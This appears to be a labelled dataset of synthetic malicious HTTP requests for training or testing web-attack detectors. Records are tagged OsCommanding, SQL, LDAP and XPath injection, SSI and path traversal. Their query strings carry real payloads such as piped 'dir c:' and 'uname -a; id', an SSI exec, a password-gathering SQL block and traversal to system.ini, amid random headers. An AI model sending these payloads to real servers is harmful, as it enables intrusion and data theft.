If-Range: Thu, 02 Dec 04 09:44:20 UTC
Max-Forwards: 143
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM ZWVlaG90c2VsVHN0RXRhOXFBdGF0ZGlsUlRpZW9JZTRvQW1pc1QzMg==
Authorization: Basic OHNldXRoOmFyenQ=
Referer: http://www.oaiss6u.net/omVN/evgr/shnoco/hirfooE/citmrf2.conf
TE: deflate;q=0.2
User-Agent: 07hwrxU/6.8.3.8.1
UA-OS: Linux
UA-Color: color16
Via: 9.4 www.icbaer.htm, 0.6 203.157.244.236, 4.5 www.5rr5im.css:5
Transfer-Encoding: bavrx
X-Serial-Number: 5484485969570755
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39498
Start - Id: 36656
class: OsCommanding
GET /i3IoY7H33Qh5U.js?sefdnel=r.vbwjnR&denrtZc4tegna6=imgfo&Enii4etax=141.250.115.8+++%7C+++dir%2Bc%3A%5C&tzdnayAd0i=eR0heW&eAnsi=%26pf8conph-nsinputs0&ss3rasa=document HTTP/1.1
Host: www.8N7eN.biz
Connection: keep-alive
Accept: text/*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 28.148.253.215
Cookie: tctfnypcjgre=5378091;laeAerfdpiohl=rh
Cookie2: $Version="51"
Date: Sun, 16 Aug 09 04:52:25 UTC
Expect: 100-continue
From: zeiTo@a5ng.biz
If-Modified-Since: Tue, 07 Jun 05 04:28:05 CET
If-Unmodified-Since: Mon, 29 May 06 12:21:58 CET
If-Match: *
If-None-Match: "2cdUO98hyQW3@xV"
If-Range: Sun, 01 Mar 09 09:29:57 GMT
Max-Forwards: 702
MIME-Version: 0.9
Proxy-Authorization: NTLM YWRmcmNpZ2gxbjhhQzVucnpjZ2l0YWxzb2R5cm9ybmFmcm4=
Authorization: knwa2 hhrais7=2pEA
Range: -3,-137
Referer: http://emDcita.ch/hROn/jxif/qbAL.css
TE: trailers,chunked;q=0.8
Trailer: If-None-Match
User-Agent: Mozilla/8.8 (Machintosh; U; PPC 7.8; gi-ms; rv:5.5.6) Gecko/54695127
UA-CPU: Sparc
UA-OS: Linux
UA-Color: color16
Via: rost5/2.2 123.53.16.166, FTP/8.9 www.tnsas.tiff
Transfer-Encoding: gzip
Upgrade: ojr3e/2.9, tEafil/9.1, h5s/7.6
X-Forwarded-For: 193.167.35.201
X-Serial-Number: 96597
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36656
Start - Id: 37838
class: LdapInjection
GET /zOh6delete/9BZYlQ7k/d7mrcI1F/IFa7kjwhereTIuWHhyF/y9hyC.cgi?wyh=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&@lgz=65H3b70 HTTP/1.1
Host: 206.185.251.133
Connection: close
Accept: audio/basic, audio/*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.8
Accept-Language: fjuhhrp-3, hf9-7attbl8;q=0.5, aoret-faioijtn;q=0.1, li-SCfr;q=0.1, mr-eemxs
Cache-Control: max-stale
Client-ip: 145.59.192.187
Cookie: o3iasEe=slUW1Uqb@;lwoooizhhkoUnud=16018264;tmssQrt=script<oqa e<iaoiowinntvetp
Cookie2: $Version="1"
Date: Sun, 23 Oct 05 22:33:51 UTC
ETag: "v.u7W79d5gfnlTy"
Expect: lw1usH=epexaq
From: tlocso@Staohr.gov
If-Modified-Since: Thu, 22 Apr 04 01:32:46 UTC
If-Unmodified-Since: Sun, 18 Apr 04 18:29:08 CET
If-Match: "6LDVJKbY8NZaxk.pXUk"
If-None-Match: "QVSgk73p6WiPs19"
If-Range: "G..oIsvFTps4g1nGtpp"
Max-Forwards: 6437
MIME-Version: 1.8
Pragma: tylayyth='anqaxab'
Proxy-Authorization: Basic MWU3Ym9hOmx0ZWllam8=
Authorization: NTLM cGVvZ3RzdGl0dWh0ZTJjbkFudGhpVTAxdHI5c3NuaWlsYW1iZTRpQXUxb3VtenM=
Range: 853418-,-430
Referer: http://www.uuaeih.gov/azAwrdal.ace
TE: trailers
Trailer: Accept
User-Agent: Mozilla/4.0 (Machintosh; U; PPC Mac OS X 4.8; rt-nt; rv:5.0.6) Gecko/11915108
UA-CPU: 68000
UA-Disp: 780,4386,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 707x739
Via: 8.6 www.npir.png:39, 9.9 www.nwee.jpg
Transfer-Encoding: foctbw
Upgrade: msdjj/6.3, nhneNR/6.0, amsilt/6.3
Warning: 819 www.pedj.gif "e9rth" "Tue, 15 Sep 09 22:46:26 GMT"
X-Forwarded-For: 138.39.90.47
X-Serial-Number: 52385869909
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37838
Start - Id: 40004
class: SSI
GET /nOe.UhJOXF/eteO6/c7-76q3.A2Da/fdxaot/t3wR1cUGgguSTYlr8eg/hwekKNKe-U7HYs/1sepxAxcLr/hdlhReahetozyaane6Er/efdusi4ehvveE8lte/ewgaAg5soirehhA/Cvxud2passwdQfOqpZUV.css?jli=cqoxrerf&nslx7Ligptnqw=7095418652&s2nullMi.=%3C%21+%23%3C%21--++%23exec+++++cmd%3D%22id%22--%3E&smePtttueunw=h&doowrrna9h=82698353&afmqlSqeniaaAt=pexec&eertshb=syrRoMthmda&oR4fnnynee=0081&edst6R3=olocation&9iKlautoexecDhavinggia=3%3Fwindow.openbupdateItetmpe%29%3Bpsl%5D%7Eo&ysewff=e HTTP/1.0
Host: 111.22.104.100:80
Connection: efo0j5O
Accept: image/jpeg;q=0.6, application/x-tar
Accept-Charset: *
Accept-Encoding: identity;q=0.8, deflate, deflate;q=0.8, deflate;q=0.1, compress
Accept-Language: *;q=0.0
Cache-Control: min-fresh=38678
Client-ip: 21.123.30.222
Cookie: astspsa=iv7Q@tiul2o_
Cookie2: $Version="317"
Date: Sat, 24 May 08 12:45:55 CET
ETag: W/"yDGjnJnSi2OEj@O9zPi9"
Expect: si3i=ayrD2qe
From: biBccc@Aoelofph.de
If-Modified-Since: Tue, 09 Feb 10 23:40:55 GMT
If-Unmodified-Since: Sat, 23 Oct 04 08:00:14 UTC
If-Match: "_L0zjhLz3uS67inl"
If-None-Match: "3cWZDBWeMpko2kshKZO"
If-Range: Wed, 20 Apr 05 10:01:30 UTC
Max-Forwards: 087
MIME-Version: 5.0
Pragma: st='Ag'
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest uri=/ehrttG/xoEy0sg/exechd.php3
Range: 617798-3375,457727-6999
Referer: http://www.nevated.net/gdotg.gif
TE: deflate;q=0.1,trailers
Trailer: If-Match
User-Agent: bnhga (oAvEburH0o; e14hBlddhj; eFSrc1J; htOKTuM7q)
UA-CPU: Sparc
UA-Disp: 846,254,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 860x1351
Via: FTP/8.2 221.151.74.10, HTTP/4.0 www.hnsHa.jpeg, HTTP/7.2 160.153.35.253
Transfer-Encoding: deflate
Upgrade: iNatOe/5.8, 1TIi/6.0, rrnz/0.3, ale/7.7
Warning: 490 www.nelmaze.html "8xbzssdeyA" "Sat, 13 Jan 07 10:11:05 GMT"
X-Serial-Number: 18116
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40004
Start - Id: 49711
class: XPathInjection
GET /aEialuecoiOecten3mW/oiemLoenaisl/peoit4x/lElrltoynaonrTlm/olBenhgfadd37ehVe/mShu/w9ABxHu.0EZZyf4t/d-NG2kWS0iC1/iLcaf/9soaXhtciemh.asp?IRfjo0eaNiorh1l=s..sYf%40D67&L@JbetweenANT.deletegmK=4390&so4=LedasswauoE&in0idAnnehhT9d=%28i++++%3C+++count%28c7c%2Fchild%3A%3Atext%28%29%29+++++and+++++j+++%3C+++count%28rT7%2Fchild%3A%3Acomment%28%29%29++and+k+++%3C+count%28Rn%2Fchild%3A%3A*%29+++++%29&eHnnsh=3i6cpacieesr HTTP/1.0
Host: www.rdSui0u.net
Connection: keep-alive
Accept: video/*, image/png
Accept-Charset: koi8-r;q=0.5
Accept-Encoding: 
Accept-Language: hlhbn-inhich;q=0.2, ee-dftaadxl
Cache-Control: max-age=82377
Client-ip: 228.33.237.21
Cookie: midqo=1459;tz@AXen=%i;lO@oB=0151208;ieid=1061766916;jetunlloh=fJukx1g
Cookie2: $Version="8"
Date: Fri, 07 May 04 22:02:26 UTC
ETag: "Wr3JumTJ7YREeQfjIy-"
Expect: eTteO
From: Etbaese@jwshhAoe.net
If-Modified-Since: Sun, 07 Jan 07 08:41:44 GMT
If-Unmodified-Since: Sat, 28 May 05 15:34:13 CET
If-Match: ".-.V.gqcyyEBT5mSH78"
If-None-Match: *
If-Range: Wed, 16 Jan 08 05:04:33 CET
Max-Forwards: 9
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: e1tls Ridd=naieme
Authorization: NTLM dGVrZW1jbnBhaXNvdHNscG9Jbm43ZnFuRHVhbWFibW1BZG50
Range: 0-,006-0351
Referer: /eeto3n/hdeoct/tam6/jpcn/issso.ace
TE: gzip;q=0.4,chunked,gzip
Trailer: Authorization
User-Agent: Mozilla/0.4 (Windows; U; Windows NT 7.1; n3-nT; rv:3.7.1) Gecko/30696347
UA-CPU: StrongARM
UA-Disp: 731,8185,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6094x1402
Via: Uao3rt/9.1 www.amaaniaa.css, dti44/2.6 www.ktdzY.jpeg:7139
Transfer-Encoding: gzip
Upgrade: hdoAgi/1.2, icsn/0.8, don/0.5
Warning: 018 www.iupl6.jpg "b3zD8yiorsn" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 44478140767151
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49711
Start - Id: 43090
class: OsCommanding
GET /rxh/llsyqH7p6GkJfCcQ/iedcheandaT4clUr/7sEaApa0Tw/4.xW/ctK7_pS2E6CNbvXL6cUN/ry7PXE@LYQA/Afmbgsoundit/nJzauXLrPelCsjPoTEh2/tame/4hfocesseodLah/IQTWxEFB6-SNTG.mdb?ee=s+5ui&K56=%3B+echo+%3B+w++%3B++++uname++-a%3B+++++id&Ma00=63&aktq25rGtt=dnany9tvupricaon&PmRDMZhDTCQ=apaccess_logeh&rfa7=47&HomperlROVsXudopt=t&eigs=4xh&joRHis1hohd8=6030&fthiofhsorn=6&innhyo7=117&de8teen=eSTM&uthThNDlmnoshg=2961954&eihOdxrhet3e=93&etmtvemrsto=iAs%5C HTTP/1.1
Host: www.itenIn.ch
Connection: keep-alive
Accept: text/plain;q=0.5, application/x-tar, application/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 115.146.109.73
Cookie: lkssdsTro=jxNhuWCs;aattvau=7anT;acTe0t0LaF=-aorcaHlrhgd7ue;xRp1k6fJTKG=c@Ri.bO0a;cwntDdh=yu$o;igsaoeena38ceoe=hFbm8h-XrG
Cookie2: $Version="41"
Date: Tue, 08 Dec 09 14:07:23 CET
ETag: W/"as5zU3TltwGEc-Ix0hc"
If-Modified-Since: Mon, 13 Dec 04 23:13:57 UTC
If-Unmodified-Since: Tue, 14 Oct 08 06:23:58 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 27 Dec 04 23:26:18 GMT
Max-Forwards: 8
Pragma: ient='i7'
Authorization: NTLM aWVkNGhlZHRlY29ubnRyTFByZWEyaWJ1c3EycnluaEFkMG9kaXpmdXI=
Referer: /siaaaie/srtalh1/keyrTvqn.msf
TE: chunked;q=0.2,trailers
Trailer: If-Modified-Since
User-Agent: rJ3siN http://www.dorta.fr
UA-OS: Mac OS X
Via: FTP/8.2 www.iog9irtq.png
Transfer-Encoding: identity
X-Serial-Number: 306986025864028

null

End - Id: 43090
Start - Id: 40929
class: SSI
GET /tPbmjrpd/R9EPkUZiaccept./pSkZnsO/bbVBgdw-TQf4/eLcolpobswr43t/hKfw.tYCZ/samCmq5MwDNpassthrul0Bq/eet4etsi5Y/islbtraayuS7dae.htm?RPsystemfxml3=90490503&wreYhwtrieu=%3C%21--+++%23odbc+connect%3D%22jztot%2Colt%2Cfano2%22++++++statement%3D%22select++*++++from++go%22--%3E HTTP/1.1
Host: www.3g7nIturt.de
Connection: close
Accept: video/quicktime, image/*
Accept-Charset: x-mac-chinesetrad;q=0.3
Accept-Encoding: deflate, gzip, gzip, gzip;q=0.2
Accept-Language: codeiyae-iI1s;q=0.3
Cache-Control: no-cache
Client-ip: 120.251.255.184
Cookie: jml=Atrri;EAs0tihqheaeH=pn wn;xhyhLdoqseVdb=;phpn;G0inzvpA1lrCrlw=eneyrcdt3qr5eboT;iatc=cs4i1ioE;JoErh1oeahs=59662012
Cookie2: $Version="8"
Date: Thu, 31 May 07 10:15:33 UTC
ETag: W/"8masr5MiUJT4dyo4siJ"
Expect: nBhmshg
From: ioOee@owoeu.be
If-Modified-Since: Wed, 03 Jan 07 20:20:50 GMT
If-Unmodified-Since: Sat, 23 Oct 04 17:19:44 GMT
If-Match: "cO1Jov4AMtofSY3"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 4.2
Pragma: neshaEiN=ss
Proxy-Authorization: Basic bGVKc3d0OndWMGU=
Authorization: stzel ahan=tesIlt4n
Range: -25
Referer: http://oulef.org/tohisxti.cgi
TE: trailers,trailers,deflate
Trailer: Accept
User-Agent: Mozilla/7.3 (X11; U; Linux i586 2.6; ol-7d; rv:8.1.5) Gecko/71134673
UA-CPU: PowerPC
UA-Disp: 661,5118,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4871x5124
Via: 5.0 www.0ssgu.tiff:09837
Transfer-Encoding: ainu; Naowi7=1iAw
Upgrade: datbe/5.7
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Forwarded-For: 60.122.216.106
X-Serial-Number: 163741114628927
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40929
Start - Id: 41677
class: SqlInjection
GET /p5NciDnFLM2rzuL/8yMunsr8pAwdivk_/ntbORqpcI2Xoa/vx@Jz@/Z7oOcftrwebJz/opFmLxZ7vP54fY8q7fu5/nYl.YtwWkWUsg2Nx1jI.cfm?lwobxsyadpz5=xCW%40&qsock_streamwPcYT=exe73Aegbrnebd18i&tdhoosg6icinTe=3988&nal2bDkaailw=535774&rrscasiege4ma=wft&soeg=44835734&v3toasoes=40hmwTor9mdtYrlekr&unuen=d4WHW&qZdivu0j6systemuX=%27%3B++++begin+++++declare++%40ret+++++varchar%288000%29++set+%40ret%3D%27%3A%27+++select++%40ret%3D%40ret%2B%27++++%27%2Beii%2B%27%2F%27%2Bpassword+++++from+++o8+++where+ti%3E%40ret+select+++%40ret++as+++ret++into++++foo+++++end-- HTTP/1.1
Host: 150.115.125.64:181
Connection: close
Accept: application/zip;q=0.9, text/plain, text/*;q=0.1
Accept-Charset: windows-1251
Accept-Encoding: 
Accept-Language: ae-jrhvwe4;q=0.8, urgcv-ishTptiw, c0su6ee-jdlie, s-hti4vrs;q=0.0, takV-eh;q=0.1
Cache-Control: no-cache
Client-ip: 90.167.69.231
Cookie: U98hQ=200411;msseeens=00855412;dobject1H=oh(c37 ;c3susr=r<;v66ywOrLef= ope<odoxvt copymdnph-;51rauktlzoecr=f
Cookie2: $Version="61"
Date: Thu, 18 Feb 10 14:12:09 CET
ETag: "qB-FTULONUY7iO2"
Expect: 100-continue
From: wnytdt@bdcjnzt.org
If-Modified-Since: Tue, 26 Oct 04 17:54:07 GMT
If-Unmodified-Since: Wed, 03 Dec 08 06:00:13 GMT
If-Match: "k4T5cAOEDHwaZ_Nc_"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM bGVkbGpuZW1ucXRsb2JnZWJiZWVmVW0ycGVzbWxpaTRWbVNHeQ==
Authorization: lrhef mar8r=0eiiUngi
Range: -91,787-299778
Referer: http://lcha.uk/seiwdi.rar
TE: deflate,trailers,chunked;q=0.6
Trailer: Date
User-Agent: L7se/6.9.3.9
UA-CPU: MIPS
UA-Disp: 1862,8220,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 232x3893
Via: HTTP/8.1 135.248.107.40, 5.7 www.pNsgl.png, HTTP/8.1 www.nasha.css
Transfer-Encoding: s53hi; n1uyhetA=ewes6aT
Upgrade: dahek/1.1, htct/7.8, rrepda/5.7, eos/3.6, uoe/1.9
Warning: 118 2.156.64.121 "naglietszhgs" 
X-Forwarded-For: 46.66.131.26
X-Serial-Number: 611965021882313
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41677
Start - Id: 42876
class: OsCommanding
GET /iLins1Iz_gm5E9x54/lfyaRdqosqOecuusaa2/HgylWNuDt.s/n_HYwfVDtiapjMdmNd/oIW/ea/hnhnescx7ddoewniuoe/x1VoptXBP9/_lEoSJG1ac/ysfrnfzshtmelngxme/7logdcmd4Y/o4a1tuekdnbeb.jpeg?rud=229.74.204.51++%7C++++dir&dtyswydjn4=rrNhttp7i%2F%7E0h%7E+emails4&Tentartzoot8r=lnAb9WIdZ54&VYXNdiv8ciZZWo=oe8uilAn4dtA&cliiu=elw.GzxiW&eoeenslnsr=84468 HTTP/1.0
Host: www.2ori1Utfp.net
Connection: close
Accept: */*
Accept-Charset: x-mac-cyrillic, big5, iso-8859-4, iso-10646-ucs-2;q=0.0, x-mac-ce;q=0.4
Accept-Encoding: deflate;q=0.9, identity;q=0.4, deflate;q=0.4, compress;q=0.8, identity
Accept-Language: t-ldv;q=0.8, miir-gurtDenl;q=0.6, ocas-7deal;q=0.8, we-yhl
Cache-Control: no-store
Cookie2: $Version="664"
Date: Sun, 22 Jul 07 24:34:34 GMT
ETag: W/"nErZ9x7YrYRGoxmbEQjD"
Expect: 100-continue
From: n2zse0bo@tibsA.uk
If-Unmodified-Since: Sat, 28 Nov 09 19:04:30 UTC
If-Match: "WrK7_oiqfGVT@ZPe3UAC"
If-None-Match: *
If-Range: *
Max-Forwards: 23
MIME-Version: 4.5
Pragma: zphtork=q
Proxy-Authorization: NTLM cG8wZVJ4ZmZ1bjc2c1RsYU5kblRzT2R0aW5Ib290b3A1
Authorization: Basic bGVhZTpzc0hTc3Vv
Referer: http://i7muOds.cz/ivrEue/U0tm/nudTm8h.aspx
TE: chunked;q=0.9,chunked;q=0.8,trailers
User-Agent: 5sQRV79 http://www.ktaSx.cz
Via: tseh/1.7 184.105.55.99
Transfer-Encoding: etso
Upgrade: llre/7.7, ldlseg/5.7
Warning: 973 www.a2Mltbl.jpeg "ycengdeih" "Sun, 20 Nov 05 15:07:42 CET"

null

End - Id: 42876
Start - Id: 35664
class: XPathInjection
GET /wMHaAGDPRI2lB/sD_zOC8/bXZLzAK9PY/dQzr24jlizU5/hGx/FBuZ4BoujZ/6VsystemsbetweenlWTp-/Mxterml_1/o3.jpg?xzMU1qstdinky=boot.iniSes%7Cd%3DCdnt6xt&le3H=521&GmG7FaJQVua=a3t%27++++or+%28i+%3C+++++count%28fehaD8%2Fchild%3A%3Atext%28%29%29++and+++++j++%3C+++++count%28spi%2Fchild%3A%3Acomment%28%29%29+++++and++++k+++++%3C++++count%281w%2Fchild%3A%3A*%29++++%29++or+%27cfF%27+%3D++%27+++DrlasTot%27+++or&nrifor2stulex=eIqefGd%40gb HTTP/1.0
Host: www.l6Ce.net:199
Connection: keep-alive
Accept: text/*, audio/*;q=0.9
Accept-Charset: koi8-r, cp-950
Accept-Encoding: compress;q=0.5, identity;q=0.4, identity;q=0.8
Accept-Language: ssWgycie-lfu, ir2aac-mllrr6Ss, r-aogw;q=0.4, EF1cnpot-r;q=0.1, 9-ahhweoo;q=0.1
Cache-Control: max-age=797
Client-ip: 251.134.194.89
Cookie: cmaetrrlrmssre=dci4;osmceaaslI3i5st=414285;9srnoNujilzfdc=34;ln=052;bBQf=WdEoyodEtmtiI
Cookie2: $Version="392"
Date: Thu, 26 Aug 04 19:40:42 UTC
ETag: "ZlkPwB.fZ8gRRFjF"
Expect: 100-continue
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Fri, 02 Nov 07 02:01:14 GMT
If-Unmodified-Since: Sat, 01 May 10 15:52:21 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Basic ZXRvOTpyeXJSaWk2cg==
Authorization: aakb lusm=bracclh
Range: -5103
Referer: /e0hlr4r.rar
TE: gzip;q=0.3
Trailer: User-Agent
User-Agent: Mozilla/9.4 (Windows; U; Win98 9.0; eg-C0; rv:8.2.1) Gecko/97812529
UA-CPU: Sparc
UA-Disp: 464,9739,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2667x788
Via: ienf/4.5 www.tbib.js
Transfer-Encoding: deflate
Upgrade: alcth4/9.0, omen/8.5
Warning: 803 161.22.234.22 "nydhoO5peei7" "Wed, 08 Feb 06 21:10:39 CET"
X-Forwarded-For: 168.165.190.35
X-Serial-Number: 24734
----: -----------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 35664
Start - Id: 38453
class: LdapInjection
GET /gsTgPechomU-3/pwLmnV8-W1t/FsfT9/kgDmail68AvbSPn9Pv/yidv_a8/axeecn.shtml?eo=xfimail&3onhwetknnsj=nsjoneg%3Fn&4n7aaff=lols&gc.pYRQy3=hegcsmiicit4ejE&wue6upotez=027177&ineeegxsoiya=%29+%28%7C++++%28displayName%3Dhad*%29++%28name+%3D++++had*+++%29%28+mail%3Dhad*++%29&z2gfNmgkB=EVsj&vdjtkuue=483915&eraeeNe=ye HTTP/1.0
Host: 196.153.99.140
Connection: sm5Fi
Accept: audio/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: seaI-eO, eru-0o2tsa;q=0.3, e-edtHtiea
Cache-Control: no-store
Client-ip: 131.162.142.41
Cookie: ucHaiv=7i os;rsg=]em f;iphEo=6421;gyCsamLbstOx=eel
Cookie2: $Version="35"
Date: Mon, 14 Jul 08 22:16:42 UTC
ETag: W/"DYNYlE_..-0XtO8cK"
Expect: 100-continue
From: ehrneaE@tHrzlsadoS.fr
If-Modified-Since: Tue, 14 Jul 09 01:11:48 GMT
If-Unmodified-Since: Thu, 21 Sep 06 02:30:15 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 26 Jan 10 11:04:23 UTC
Max-Forwards: 88
MIME-Version: 3.3
Pragma: 9='tGl3bE'
Proxy-Authorization: Digest realm
Authorization: Basic OTZkbjpqMXVycjlY
Range: 283-,-1,-786
Referer: http://www.a18eh.de/jylsLqeo/smtwi/ioinw0/2totrnda/ne0im.nsf
TE: trailers,trailers,deflate
Trailer: If-Match
User-Agent: yIxFgloBNf http://www.ltitohc0.biz
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 632x125
Via: HTTP/2.7 www.newa.css
Transfer-Encoding: identity
Upgrade: Sao/2.0
Warning: 346 www.tt8o.css "ptUwt" "Mon, 17 Mar 08 22:41:42 GMT"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38453
Start - Id: 38460
class: LdapInjection
GET /z6r3nsSl/sBppnP_Fd.jpeg?nRt=5261036978&3oslIh=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: www.iasnte.st
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: t0dtcir-Dilie, 3-yshsifm, eRn-M;q=0.2, Esoiaa-ti3c
Cache-Control: max-age=17
Client-ip: 131.162.142.41
Cookie: tqet=orelike
Cookie2: $Version="35"
Date: Tue, 10 Jun 08 14:14:41 CET
ETag: "0xNH7BEhHoCvPrUYA"
Expect: betmtr=nyjiso;hCgrf6g
From: tyfttbup@ihotaatFt.uk
If-Modified-Since: Sat, 23 Dec 06 24:50:10 GMT
If-Unmodified-Since: Thu, 02 Dec 04 15:08:57 UTC
If-Match: "K2yqNjaw_2CbblYitBg0"
If-None-Match: *
If-Range: Fri, 05 Jun 09 09:18:42 UTC
Max-Forwards: 116
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: iiEb vcnyig9=nalmt
Authorization: Basic ODVuc25naGw6bmF4dG1p
Range: 24-,76759-,-19589
Referer: /aa2tte/rmefsena/girl/road2e.mdb
TE: trailers
Trailer: If-Match
User-Agent: wiIredetsmar
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 632x125
Via: FTP/3.0 54.95.111.192
Transfer-Encoding: deflate
Upgrade: he9qat/8.2, oIocas/7.0
Warning: 346 www.tt8o.css "ptUwt" "Mon, 17 Mar 08 22:41:42 GMT"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38460
Start - Id: 44247
class: OsCommanding
GET ..�../..�../mssql7/install/pubtext.bat" & dir c: .exe? HTTP/1.1
Host: www.o42zaeii.uk
Connection: keep-alive
Accept: video/quicktime, application/*, video/*
Accept-Charset: *
Accept-Encoding: compress, deflate;q=0.5
Accept-Language: *
Cache-Control: 8='s7'
Client-ip: 182.20.30.117
Cookie: it7aon=enpcSho;ozednyny=impedKrtehtfdr;NfUisrethilw=t'0 enp7tlosnesnh;weqcar=rqzPbwOWvLb;HqyortAa=91357;itn=021829
Cookie2: $Version="6"
Date: Sat, 13 Feb 10 23:38:49 UTC
ETag: "-8T0kbq_jilGiD3"
Expect: ohder2=drntNg
From: ided@udhoes.uk
If-Modified-Since: Tue, 09 Oct 07 03:46:43 GMT
If-Unmodified-Since: Sun, 27 Jan 08 11:33:17 CET
If-Match: "jSRoJer_RD4y28gIjjo"
If-None-Match: "JK0huRf887lS7kE43t"
If-Range: *
Max-Forwards: 59
MIME-Version: 7.7
Pragma: kadlo3=ttpvis
Proxy-Authorization: Basic YmVhemVzOmF0b2dhbGU=
Authorization: Digest qop=auth
Range: 2-,4748-58
Referer: /Rsaoi/tesRr4s/ssiieM/rslaDbx.asmx
TE: trailers
Trailer: Range
User-Agent: Mozilla/4.0 (compatible; 6erszdg3e; Open BSD i586; PerFva; Seqotdai)
UA-CPU: Sparc
UA-Disp: 220,5543,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 352x848
Via: HTTP/4.1 104.245.120.13, HTTP/2.1 245.174.241.3:8
Transfer-Encoding: 6ris; osgnkcE=urwji
Upgrade: hrl/2.7, tuad/2.6, kea/2.0, vowi/4.8
Warning: 992 www.i1e3itee.jpg "capc8tz" 
X-Forwarded-For: 242.235.213.130
X-Serial-Number: 87791101469123011682
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44247
Start - Id: 45371
class: PathTransversal
PUT /netcatzu3d/nYTaip/eirsiCmvgaeh/sth6bp/aomoleectdeeoueOa/J27kexec/3@vmTFFOGiEGuWs.php? HTTP/1.1
Content-Length: 76
Content-Language: btsysl,tSihwng,vn
Content-Encoding: identity
Content-Location: /iwtioyr.dll
Content-MD5: aGxpdHJibkVvZmFvbWVobg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Feb 07 22:49:07 GMT
Last-Modified: Thu, 02 Jul 09 12:29:33 UTC
Host: 233.235.109.210
Connection: keep-alive
Accept: text/*;q=0.5, application/*, audio/*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: lsh-3xevd9ol;q=0.0, T-ecrni, yMh-su6baham, t6qr-Oimnerr;q=0.7, uiiO-5wtl;q=0.9
Cache-Control: max-stale=5
Client-ip: 219.120.83.225
Cookie: xoihinjeseozv=0;3Rr2wgetes8Ue8=crano
Cookie2: $Version="96"
Date: Thu, 08 Jan 09 02:59:34 CET
ETag: W/"B9SBjm1lLCiZpvnPjtU"
Expect: 100-continue
From: meaol@shaU.gov
If-Modified-Since: Sat, 20 Mar 10 11:23:22 UTC
If-Unmodified-Since: Sun, 23 Dec 07 24:30:02 UTC
If-Match: "8bl_RjSClDPqSdpag"
If-None-Match: *
If-Range: Sat, 17 Apr 10 23:57:22 UTC
Max-Forwards: 718
MIME-Version: 4.4
Pragma: eel='sy'
Proxy-Authorization: Basic c2V1cnRtcjpkZTF1
Authorization: 8scl oc3estr=drjeiie
Range: 74377-10,-135
Referer: http://br2uFhn.it/didIar2e/trarnnto/Wn9w/aibedjnh/oiNrtmh.dll
TE: trailers,gzip,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.8 (X11; U; Open BSD i386 8.7; oS-tt; rv:2.7.5) Gecko/89162925
UA-CPU: Sparc
UA-Disp: 9353,7001,16
UA-Color: color8
UA-Pixels: 0455x0884
Via: 1.0 40.146.129.164, FTP/3.4 3.243.189.169, ooe/1.3 33.111.197.167:3324
Transfer-Encoding: compress
Warning: 033 102.101.187.47 "senpv3nMsOiNryeagcPt" 
X-Forwarded-For: 42.158.87.228
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

McZKBN6Zke7access_log=..\..\..\..\..\..\WINNT\system.ini&ae=wi

